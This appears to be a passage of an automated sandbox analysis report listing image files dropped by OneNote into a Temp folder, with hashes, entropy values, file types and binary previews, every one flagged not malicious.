                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{8972EE62-B783-4BB5-8D26-6E971413BE1E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Temp\{8A9D61A8-0B09-452B-BE49-3EC6170421A8}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1547
                                                                                                  Entropy (8bit):6.4194805172468286
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                  MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                  SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                  SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                  SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

                                                                                                  C:\Users\user\AppData\Local\Temp\{8D096828-8C62-4849-9B9A-BFC0DA53B558}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Temp\{8D1129D0-7765-4F74-8DAB-F69CF5D74B27}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3009
                                                                                                  Entropy (8bit):7.493528353751471
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                  MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                  SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                  SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                  SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

                                                                                                  C:\Users\user\AppData\Local\Temp\{8D69E8DD-90C7-46D0-8821-E589B52354A2}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Temp\{8E7C14C5-D276-4E70-9962-9C880F8EE212}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Temp\{8F240BEC-6DBF-4A14-9DFB-4DAF6DE3D61A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{90D78F94-4154-4292-93E2-EB25F94F708C}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{912801C5-AC29-4B91-8879-2952242CAC0F}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Temp\{9170DB0A-E06D-4C35-9838-2D2FD8805B88}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Temp\{91EF41BD-5259-489F-AE16-076FF2007CD6}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Temp\{91F57B09-9123-4B02-9841-E9864A759B6E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Temp\{922152E8-7943-465B-A754-997AECC3D719}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
